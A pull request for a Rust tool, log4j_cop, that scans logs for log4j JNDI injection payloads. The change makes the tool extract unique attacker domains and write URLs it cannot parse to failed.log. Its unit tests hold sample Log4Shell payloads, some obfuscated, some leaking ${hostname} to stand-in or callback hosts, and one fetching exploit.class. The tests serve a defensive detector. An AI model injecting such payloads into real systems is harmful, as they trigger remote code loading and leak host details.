### PR TITLE
Infer unique domains from detected log4j payloads

### DIFF
--- a/Cargo.toml
+++ b/Cargo.toml
@@ -1,12 +1,12 @@
 [package]
 name = "log4j_cop"
-version = "0.1.0"
+version = "0.2.0"
 edition = "2021"
 
 # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
 
 [dependencies]
+clap = "2.34.0"
 lazy_static = "1.4.0"
 urlencoding = "2.1.0"
-clap = "2.34.0"
-csv = "1.1"
+url = "2.2.2"

--- a/README.md
+++ b/README.md
@@ -18,7 +18,7 @@ $ cargo build --release
 $ ./log4j_cop --help
 log4j_cop 0.2
 Bernardo de Araujo
-Search logs for log4j payloads and optionally extract URLs.
+Search logs for log4j payloads and optionally extract domains.
 
 USAGE:
     log4j_cop [OPTIONS] <LOG_FILE>
@@ -28,7 +28,9 @@ FLAGS:
     -V, --version    Prints version information
 
 OPTIONS:
-    -u, --urls_output_path <urls_output_path>    When specified URLs will be extracted and persisted in CSV format
+    -d, --domains_output_path <domains_output_path>
+            When specified domains will be extracted and persisted in this file. Unrecognized domains will be saved in a
+            file called failed.log.
 
 ARGS:
     <LOG_FILE>    Specifies the log file to be used

--- a/src/extractor/mod.rs
+++ b/src/extractor/mod.rs
@@ -1,21 +1,26 @@
-use csv::Writer;
-use std::collections::HashMap;
+use std::collections::HashSet;
 use std::error::Error;
+use std::fs::File;
+use std::io::{LineWriter, Write};
+use std::path::PathBuf;
+use url::{Host, ParseError, Url};
 
 pub struct Extractor {
     is_extractable: bool,
-    urls: HashMap<String, u64>,
+    domains: HashSet<String>,
+    failed_parsing: HashSet<String>,
 }
 
 impl Extractor {
     pub fn new(is_extractable: bool) -> Self {
         Self {
-            urls: HashMap::new(),
+            domains: HashSet::new(),
+            failed_parsing: HashSet::new(),
             is_extractable,
         }
     }
 
-    pub fn extract_urls(&mut self, line: &str) {
+    pub fn extract_domains(&mut self, line: &str) {
         if !self.is_extractable {
             return;
         }
@@ -23,28 +28,56 @@ impl Extractor {
         let mut payloads = line;
 
         while let Some((start, end)) = parse_url(payloads) {
-            *self
-                .urls
-                .entry(payloads[start..end].to_string())
-                .or_insert(0) += 1;
+            let url = &payloads[start..end];
+
+            match extract_domain(url) {
+                Ok(domain) => {
+                    self.domains.insert(domain);
+                }
+                Err(url) => {
+                    if !url.is_empty() {
+                        self.failed_parsing.insert(url);
+                    }
+                }
+            };
 
             payloads = &payloads[end..];
         }
     }
 
-    pub fn extract_to_csv(&self, output_path: Option<&str>) -> Result<(), Box<dyn Error>> {
-        if self.urls.is_empty() {
+    pub fn extract_to_files(&self, output_path: Option<PathBuf>) -> Result<(), Box<dyn Error>> {
+        if output_path.is_none() {
             return Ok(());
         }
 
         let output_path = output_path.unwrap();
-        let mut writer = Writer::from_path(output_path)?;
 
-        for (domain, count) in self.urls.iter() {
-            writer.write_record(&[domain, &count.to_string()])?;
+        if !self.domains.is_empty() {
+            let file = File::create(output_path.clone())?;
+            let mut file = LineWriter::new(file);
+
+            for domain in self.domains.iter() {
+                writeln!(file, "{}", domain)?;
+            }
+
+            file.flush()?;
         }
 
-        writer.flush()?;
+        if !self.failed_parsing.is_empty() {
+            let mut error_path = output_path;
+            error_path.pop();
+            error_path = error_path.join("failed.log");
+
+            let file = File::create(error_path)?;
+            let mut file = LineWriter::new(file);
+
+            for url in self.failed_parsing.iter() {
+                writeln!(file, "{}", url)?;
+            }
+
+            file.flush()?;
+        }
+
         Ok(())
     }
 }
@@ -62,20 +95,84 @@ fn parse_url(line: &str) -> Option<(usize, usize)> {
         offset += search_index;
     }
 
-    let domain = line[offset..].chars();
+    let domain = &line[offset..];
+    let first_slash = domain.find('/').unwrap_or(usize::MAX);
     let mut brackets = 1;
 
-    for (pos, letter) in domain.enumerate() {
-        match (letter, brackets) {
-            ('}', 1) => return Some((offset, offset + pos)),
-            ('=', _) => return Some((offset, offset + pos)),
-            ('{', _) => brackets += 1,
-            ('}', _) => brackets -= 1,
+    // Taking care of nested jndi payloads in a query string by stopping at the "=" sign after a slash
+    // It should only happen after we find the first slash since we could be removing Base64 encoded URLs otherwise
+    //
+    // We stop when our bracket reaches 0 since the payload has form ${jndi:ldap://<url>} and we start the search from "//",
+    // hence starting the bracket count as 1 to take into account the opening bracket.
+    for (pos, letter) in domain.chars().enumerate() {
+        match (letter, brackets, pos > first_slash) {
+            ('}', 1, _) => return Some((offset, offset + pos)),
+            ('=', _, true) => return Some((offset, offset + pos)),
+            ('{', _, _) => brackets += 1,
+            ('}', _, _) => brackets -= 1,
             _ => continue,
         }
     }
 
     None
+}
+
+fn extract_domain(url: &str) -> Result<String, String> {
+    let parsed_url = match Url::parse(url) {
+        Err(ParseError::RelativeUrlWithoutBase) => {
+            let url_with_fake_base = format!("https://{}", url);
+            Url::parse(&url_with_fake_base)
+        }
+        result => result,
+    };
+
+    if parsed_url.is_err() || parsed_url.clone().unwrap().host().is_none() {
+        match best_effort_domain_extract(url) {
+            Some(best_effort) => return Ok(best_effort),
+            _ => {
+                return Err(url.to_string());
+            }
+        };
+    }
+
+    let parsed_url = parsed_url.unwrap();
+    let domain = match parsed_url.host().unwrap() {
+        Host::Ipv4(ip) => ip.to_string(),
+        Host::Ipv6(ip) => ip.to_string(),
+        domain => {
+            let mut domain = domain.to_string();
+
+            if parsed_url.port().is_some() {
+                domain = format!("{}:{}", domain, parsed_url.port().unwrap());
+            }
+
+            match best_effort_domain_extract(&domain) {
+                Some(best_effort) => return Ok(best_effort),
+                _ => return Err(url.to_string()),
+            };
+        }
+    };
+
+    Ok(domain)
+}
+
+fn best_effort_domain_extract(url: &str) -> Option<String> {
+    let (domain, _) = url.split_once("/").unwrap_or((url, ""));
+    let last_dot = domain.rfind('.')?;
+    let second_dot = &domain[..(last_dot - 1)].rfind('.');
+
+    let domain = if second_dot.is_some() {
+        let second_dot = second_dot.unwrap();
+        &domain[(second_dot + 1)..]
+    } else {
+        &domain
+    };
+
+    if domain.contains("${") || domain.contains('}') {
+        return None;
+    }
+
+    Some(domain.to_owned())
 }
 
 #[cfg(test)]
@@ -85,39 +182,42 @@ mod tests {
     #[test]
     fn extracts_single_domain_in_line() {
         let mut extractor = Extractor::new(true);
-        extractor.extract_urls("https://mywebsite.com/?x=${jndi:ldap://${hostname}.c6340b92vtc00002.interactsh.com/path/a}");
-        assert!(extractor
-            .urls
-            .contains_key("${hostname}.c6340b92vtc00002.interactsh.com/path/a"));
+        extractor.extract_domains("https://mywebsite.com/?x=${jndi:ldap://${hostname}.c6340b92vtc00002.interactsh.com/path/a}");
+        assert!(extractor.domains.contains("interactsh.com"));
     }
 
     #[test]
-    fn extracts_multiple_urls_in_line() {
+    fn extracts_multiple_domains_in_line() {
         let mut extractor = Extractor::new(true);
-        extractor.extract_urls("${jndi:ldap://evilsite.com/z}${jndi:ldap://mywebsite.com/z}");
+        extractor.extract_domains("${jndi:ldap://evilsite.com/z}${jndi:ldap://mywebsite.com/z}");
 
-        assert!(extractor.urls.contains_key("evilsite.com/z"));
-        assert!(extractor.urls.contains_key("mywebsite.com/z"));
+        assert!(extractor.domains.contains("evilsite.com"));
+        assert!(extractor.domains.contains("mywebsite.com"));
     }
 
     #[test]
-    fn extracts_multiple_urls_in_json_line() {
+    fn extracts_ips() {
         let mut extractor = Extractor::new(true);
-        extractor.extract_urls("{\"result\":{\"_raw\":\"{\"level\":\"info\",\"msg\":\"completed\",\"request_method\":\"get\",\"request_user_agent\":\"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostname}.tricky.com/a}\",\"request_referer\":\"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostname}.complex.dev/z}\",\"referer\":\"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://foo.wat.ca/a}\"}}");
+        extractor.extract_domains("${jndi:ldap://45.66.8.12/z}");
 
-        assert!(extractor.urls.contains_key("${hostname}.tricky.com/a"));
-        assert!(extractor.urls.contains_key("${hostname}.complex.dev/z"));
-        assert!(extractor.urls.contains_key("foo.wat.ca/a"));
+        assert!(extractor.domains.contains("45.66.8.12"));
     }
 
     #[test]
-    fn increments_count_for_repeated_urls() {
+    fn extracts_base64_encoded_subdomains() {
         let mut extractor = Extractor::new(true);
-        extractor.extract_urls("{\"result\":{\"_raw\":\"{\"level\":\"info\",\"msg\":\"completed\",\"request_method\":\"get\",\"request_user_agent\":\"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostname}.tricky.com/a}\",\"request_referer\":\"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://foo.wat.ca/a}\",\"referer\":\"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://foo.wat.ca/a}\"}}");
+        extractor.extract_domains("${jndi:ldap://cG90YXRvLmNvbTo0NDM=.c6pj00ppfhiq0g1pq80gcg3w5moyd9wo4.interactsh.com:1234/exploit.class}");
 
-        assert!(extractor.urls.contains_key("${hostname}.tricky.com/a"));
-        assert_eq!(Some(&1), extractor.urls.get("${hostname}.tricky.com/a"));
-        assert!(extractor.urls.contains_key("foo.wat.ca/a"));
-        assert_eq!(Some(&2), extractor.urls.get("foo.wat.ca/a"));
+        assert!(extractor.domains.contains("interactsh.com:1234"));
+    }
+
+    #[test]
+    fn extracts_multiple_domains_in_json_line() {
+        let mut extractor = Extractor::new(true);
+        extractor.extract_domains("{\"result\":{\"_raw\":\"{\"level\":\"info\",\"msg\":\"completed\",\"request_method\":\"get\",\"request_user_agent\":\"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostname}.tricky.com/a}\",\"request_referer\":\"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostname}.complex.dev/z}\",\"referer\":\"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://foo.wat.ca/a}\"}}");
+
+        assert!(extractor.domains.contains("tricky.com"));
+        assert!(extractor.domains.contains("complex.dev"));
+        assert!(extractor.domains.contains("wat.ca"));
     }
 }

--- a/src/main.rs
+++ b/src/main.rs
@@ -10,6 +10,7 @@ use clap::{App, Arg};
 
 use std::fs::File;
 use std::io::{BufRead, BufReader};
+use std::path::PathBuf;
 use urlencoding::decode;
 
 mod ruleset;
@@ -21,7 +22,7 @@ use extractor::Extractor;
 fn main() {
     let matches = App::new("log4j_cop")
         .version("0.2")
-        .about("Search logs for log4j payloads and optionally extract URLs.")
+        .about("Search logs for log4j payloads and optionally extract domains.")
         .author("Bernardo de Araujo")
         .arg(
             Arg::with_name("LOG_FILE")
@@ -30,12 +31,12 @@ fn main() {
                 .help("Specifies the log file to be used"),
         )
         .arg(
-            Arg::with_name("urls_output_path")
-                .short("u")
-                .long("urls_output_path")
+            Arg::with_name("domains_output_path")
+                .short("d")
+                .long("domains_output_path")
                 .takes_value(true)
                 .required(false)
-                .help("When specified URLs will be extracted and persisted in CSV format"),
+                .help("When specified domains will be extracted and persisted in this file. Unrecognized domains will be saved in a file called failed.log."),
         )
         .get_matches();
 
@@ -43,8 +44,8 @@ fn main() {
     let file = File::open(&filename).expect("Unable to open log file.");
     let reader = BufReader::new(file);
     let ruleset = Ruleset::new(&mut RULES.trim().lines());
-    let urls_output_path = matches.value_of("urls_output_path");
-    let mut extractor = Extractor::new(urls_output_path.is_some());
+    let domains_output_path = matches.value_of("domains_output_path");
+    let mut extractor = Extractor::new(domains_output_path.is_some());
 
     for line in reader.lines() {
         if line.is_err() {
@@ -55,12 +56,12 @@ fn main() {
         let line = decode(&line).map_or(line.to_owned(), |decoded| decoded.to_string());
 
         if ruleset.match_rules(&line) {
-            extractor.extract_urls(&line);
+            extractor.extract_domains(&line);
             println!("{}", line);
         }
     }
 
-    if let Err(err) = extractor.extract_to_csv(urls_output_path) {
+    if let Err(err) = extractor.extract_to_files(domains_output_path.map(PathBuf::from)) {
         println!("There was an issue when writing to the URL log.");
         println!("{}", err);
     }


### PR DESCRIPTION
When a domain cannot be inferred the URL will be appended to a file called "failed.log".